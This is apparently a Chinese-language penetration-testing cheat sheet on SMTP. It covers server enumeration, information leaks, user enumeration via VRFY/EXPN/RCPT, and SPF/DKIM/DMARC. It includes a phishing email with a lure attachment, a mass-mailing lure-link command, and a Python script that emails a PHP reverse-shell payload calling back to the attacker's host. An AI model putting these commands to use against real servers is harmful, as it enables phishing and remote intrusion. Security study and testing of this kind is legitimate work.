基本信息

SMTP (简单邮件传输协议) 一种用于发送和接收电子邮件的 TCP/IP 协议,但是由于他在接收端对消息的接受能力有限,因此通常和 POP3/IMAP 一起使用,使用户可以将消息保存在服务器邮箱中并可以从服务器下载它们 默认端口 : 25, 465(ssl),587(ssl)
  1. PORT STATE SERVICE REASON VERSION
  2. 25/tcp open smtp syn-ack Microsoft ESMTP 6.0.3790.3959

基本活动

1. 基本连接

  1. 邮件传输协议 <font style="color:rgb(51, 51, 51);">nc --nv IP > 25</font>
  2. 短信服务
  1. openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS 没有 starttls 命令
  2. openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587

2. 查找 MX 服务器

  1. dig +short mx google.com

3. 枚举

  1. nmap -p25 --script smtp-commands 10.10.10.10
  2. nmap -p25 --script smtp-open-relay 10.10.10.10 -v

4. NTLM Auth - 信息泄露

如果服务器支持 NTLM 身份验证 (Windows) 就可以获得敏感信息的版本 —> 博客 plain root@kali: telnet example.com 587 220 example.com SMTP Server Banner >> HELO 250 example.com Hello [x.x.x.x] >> AUTH NTLM 334 NTLM supported >> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= 334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA 以上行为也可以使用 nmap 的 smtp-ntlm-info.nse 自动执行

5. 内部服务器名称-信息泄露

当发出没有完整命令的 “MAIL FROM” 时,某些 SMTP 服务器会自动完成发件人的地址,从而泄露其内部名
  1. 220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
  2. EHLO all
  3. 250-somedomain.com Hello [x.x.x.x]
  4. 250-TURN
  5. 250-SIZE 52428800
  6. 250-ETRN
  7. 250-PIPELINING
  8. 250-DSN
  9. 250-ENHANCEDSTATUSCODES
  10. 250-8bitmime
  11. 250-BINARYMIME
  12. 250-CHUNKING
  13. 250-VRFY
  14. 250 OK
  15. MAIL FROM: me # 这里只写了 me ,而服务器却自动填充了地址,
  16. 250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK

6. 嗅探

检查是否从数据报中嗅探了一些密码到端口 25

7. Auth 暴力破解

用户名暴力枚举

1. RCPT TO

  1. $ telnet 10.0.10.1 25
  2. Trying 10.0.10.1...
  3. Connected to 10.0.10.1.
  4. Escape character is '^]'.
  5. 220 myhost ESMTP Sendmail 8.9.3
  6. HELO x
  7. 250 myhost Hello [10.0.0.99], pleased to meet you
  8. MAIL FROM:test@test.org
  9. 250 2.1.0 test@test.org... Sender ok
  10. RCPT TO:test
  11. 550 5.1.1 test... User unknown
  12. RCPT TO:admin
  13. 550 5.1.1 admin... User unknown
  14. RCPT TO:ed
  15. 250 2.1.5 ed... Recipient ok

2. VRFY

  1. $ telnet 10.0.0.1 25
  2. Trying 10.0.0.1...
  3. Connected to 10.0.0.1.
  4. Escape character is '^]'.
  5. 220 myhost ESMTP Sendmail 8.9.3
  6. HELO
  7. 501 HELO requires domain address
  8. HELO x
  9. 250 myhost Hello [10.0.0.99], pleased to meet you
  10. VRFY root
  11. 250 Super-User <root@myhost>
  12. VRFY blah
  13. 550 blah... User unknown

3. EXPN

  1. $ telnet 10.0.10.1 25
  2. Trying 10.0.10.1...
  3. Connected to 10.0.10.1.
  4. Escape character is '^]'.
  5. 220 myhost ESMTP Sendmail 8.9.3
  6. HELO
  7. 501 HELO requires domain address
  8. HELO x
  9. EXPN test
  10. 550 5.1.1 test... User unknown
  11. EXPN root
  12. 250 2.1.5 <ed.williams@myhost>
  13. EXPN sshd
  14. 250 2.1.5 sshd privsep <sshd@mail2>

4. 自动化工具

  1. Metasploit: auxiliary/scanner/smtp/smtp_enum
  2. smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
  3. Nmap: nmap --script smtp-enum-users <IP>

DSN Reports

如果你向某个组织发送电子邮件至无效地址,该组织将通知该地址无效并发回邮件给你,返回的电子邮件的标题将包含可能的敏感信息(eg: 与报告交互的邮件服务的 IP 地址或防病毒软件信息)

命令

  1. 从 Linux 控制台发送电子邮件
  2. 使用 Python 代码进行发送
  1. root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
  2. Reading message body from STDIN because the '-m' option was not used.
  3. If you are manually typing in a message:
  4. - First line must be received within 60 seconds.
  5. - End manual input with a CTRL-D on its own line.
  6. IT Dept,
  7. We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.
  8. Sincerely,
swaks —to $(cat emails | tr ‘\n’ ‘,’ | less) —from test@sneakymailer.htb —header “Subject: test” —body “please click here http://10.10.14.42/“ —server 10.10.10.197
  1. from email.mime.multipart import MIMEMultipart
  2. from email.mime.text import MIMEText
  3. import smtplib
  4. import sys
  5. lhost = "127.0.0.1"
  6. lport = 443
  7. rhost = "192.168.1.1"
  8. rport = 25 # 489,587
  9. # create message object instance
  10. msg = MIMEMultipart()
  11. # setup the parameters of the message
  12. password = ""
  13. msg['From'] = "attacker@local"
  14. msg['To'] = "victim@local"
  15. msg['Subject'] = "This is not a drill!"
  16. # payload
  17. message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
  18. print("[*] Payload is generated : %s" % message)
  19. msg.attach(MIMEText(message, 'plain'))
  20. server = smtplib.SMTP(host=rhost,port=rport)
  21. if server.noop()[0] != 250:
  22. print("[-]Connection Error")
  23. exit()
  24. server.starttls()
  25. # Uncomment if log-in with authencation
  26. # server.login(msg['From'], password)
  27. server.sendmail(msg['From'], msg['To'], msg.as_string())
  28. server.quit()
  29. print("[***]successfully sent email to %s:" % (msg['To']))

邮件欺骗

因为 SMTP 消息很容易被欺骗,因此组织使用 SPF/DKIM/DMARC 功能来防止各方发送未经授权的电子邮件

1. SPF

SPF 为了防止随意伪造发件人 —> 参考博客 如果要检查域的 SPF ,可以使用在线工具 —> 链接 ### 1. SPF 记录的原理 SPF 记录实际上是服务器的一个 DNS 记录,原理其实很简单: 假设邮件服务器收到了一封邮件,来自主机的 IP 是173.194.72.103,并且声称发件人为email@example.com。为了确认发件人不是伪造的,邮件服务器会去查询example.com的 SPF 记录。如果该域的 SPF 记录设置允许 IP 为173.194.72.103的主机发送邮件,则服务器就认为这封邮件是合法的;如果不允许,则通常会退信,或将其标记为垃圾/仿冒邮件。 因为不怀好心的人虽然可以「声称」他的邮件来自example.com,但是他却无权操作example.com的 DNS 记录;同时他也无法伪造自己的 IP 地址。因此 SPF 是很有效的,当前基本上所有的邮件服务提供商(例如 Gmail、QQ 邮箱等)都会验证它。

2. SPF 记录的语法

一条 SPF 记录定义了一个或者多个 mechanism,而 mechanism 则定义了哪些 IP 是允许的,哪些 IP 是拒绝的。 这些 mechanism 包括以下几类:

all | ip4 | ip6 | a | mx | ptr | exists | include

每个 mechanism 可以有四种前缀:
  1. "+" Pass(通过)
  2. "-" Fail(拒绝)
  3. "~" Soft Fail(软拒绝)
  4. "?" Neutral(中立)
测试时,将从前往后依次测试每个 mechanism。如果一个 mechanism 包含了要查询的 IP 地址(称为命中),则测试结果由相应 mechanism 的前缀决定。默认的前缀为+。如果测试完所有的 mechanisms 也没有命中,则结果为 Neutral。 除了以上四种情况,还有 None(无结果)、PermError(永久错误)和 TempError(临时错误)三种其他情况。对于这些情况的解释和服务器通常的处理办法如下:
结果 含义 服务器处理办法
Pass 发件 IP 是合法的 接受来信
Fail 发件 IP 是非法的 退信
Soft Fail 发件 IP 非法,但是不采取强硬措施 接受来信,但是做标记
Neutral SPF 记录中没有关于发件 IP 是否合法的信息 接受来信
None 服务器没有设定 SPF 记录 接受来信
PermError 发生了严重错误(例如 SPF 记录语法错误) 没有规定
TempError 发生了临时错误(例如 DNS 查询失败) 接受或拒绝
注意,上面所说的「服务器处理办法」仅仅是 SPF 标准做出的建议,并非所有的邮件服务器都严格遵循这套规定。

3. Mechanisms

  1. all表示所有 IP,肯定会命中。因此通常把它放在 SPF 记录的结尾,表示处理剩下的所有情况。例如:
  2. ip4格式为ip4:或者ip4:/,指定一个 IPv4 地址或者地址段。如果prefix-length没有给出,则默认为/32。例如:
  3. ip6格式和ip4的很类似,默认的prefix-length/128。例如:
  4. a 和 mx这俩的格式是相同的,以a为例,格式为以下四种之一:
  5. include格式为include:,表示引入域名下的 SPF 记录。注意,如果该域名下不存在 SPF 记录,则会导致一个PermError结果。例如:“v=spf1 include:example.com -all” 即采用和 example.com 完全一样的 SPF 记录
  6. exists格式为exists:。将对执行一个 A 查询,如果有返回结果(无论结果是什么),都会看作命中。
  7. ptr格式为ptr或者ptr:。使用ptr机制会带来大量很大开销的 DNS 查询,所以连官方都不推荐使用它。
  8. redirect格式为redirect=将用给定域名的 SPF 记录替换当前记录。
  9. exp格式为exp=,目的是如果邮件被拒绝,可以给出一个消息。而消息的具体内容会首先对执行 TXT 查询,然后执行宏扩展得到。
  1. "v=spf1 -all" 拒绝所有(表示这个域名不会发出邮件)
  2. "v=spf1 +all" 接受所有(域名所有者认为 SPF 是没有用的,或者根本不在乎它)
  1. "v=spf1 ip4:192.168.0.1/16 -all"
  2. 只允许在 192.168.0.1 ~ 192.168.255.255 范围内的 IP
  1. "v=spf1 ip6:1080::8:800:200C:417A/96 -all"
  2. 只允许在 1080::8:800:0000:0000 ~ 1080::8:800:FFFF:FFFF 范围内的 IP
  1. a
  2. a/<prefix-length>
  3. a:<domain>
  4. a:<domain>/<prefix-length>
v=spf1 a mx ip4:173.194.72.103 -all 会命中相应域名的 a 记录(或 mx 记录)中包含的 IP 地址(或地址段)。如果没有提供域名,则使用当前域名。例如: 例如,这是一个比较常见的 SPF 记录,它表示支持当前域名的 a 记录和 mx 记录,同时支持一个给定的 IP 地址;其他地址则拒绝:

2. DKIM

DKIM 在电子邮件的标题中插入一个数字签名,邮件接收服务器在后到 DKIM 签名的邮件后,可验证邮件是否确实来自发件人,DKIM 使用公钥加密发,依赖于一对密钥,公钥保存在域的 TXT 记录中,但是必须知道域名才能检索它
  1. dig 20120113._domainkey.gmail.com TXT | grep p=
  2. 20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCg
  3. KCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3

3. DMARC

这是一种在 SPF 和 DKIM 基础上扩展的邮件身份验证方法 获取DMARC记录需要查询 _dmarc 子域名
  1. root@kali:~# dig _dmarc.yahoo.com txt | grep DMARC
  2. _dmarc.yahoo.com. 1785 IN TXT "v=DMARC1\; p=reject\; sp=none\; pct=100\;
  3. rua=mailto:dmarc-yahoo-rua@yahoo-inc.com, mailto:dmarc_y_rua@yahoo.com\;"
  4. root@kali:~# dig _dmarc.google.com txt | grep DMARC
  5. _dmarc.google.com. 600 IN TXT "v=DMARC1\; p=quarantine\; rua=mailto:mailauth-reports@google.com"
  6. root@kali:~# dig _dmarc.paypal.com txt | grep DMARC
  7. _dmarc.paypal.com. 300 IN TXT "v=DMARC1\; p=reject\; rua=mailto:d@rua.agari.com\;
  8. ruf=mailto:dk@bounce.paypal.com,mailto:d@ruf.agari.com"
标签名 作用 示例
v 协议版本 v=DMARC1
pct 对失败邮件应用策略的百分比 pct=20
ruf 接受失败报告的电子邮件 ruf=mailto:authfail@example.com
rua 接受聚合报告的电子邮件 rua=mailto:aggrep@example.com
p 策略,该策略将被应用到验证失败的邮件上。可以设置成 ‘none’, ‘quarantine’, 或者 ‘reject’。’none’ 用来收集 DMARC 报告。’quarantine’ 用来隔离可疑邮件。’reject’ 拒收可疑邮件 p=quarantine
sp 子域名策略 sp=reject
adkim 指定 DKIM 的对齐策略 adkim=s
aspf 指定 SPF 的对齐策略 aspf=r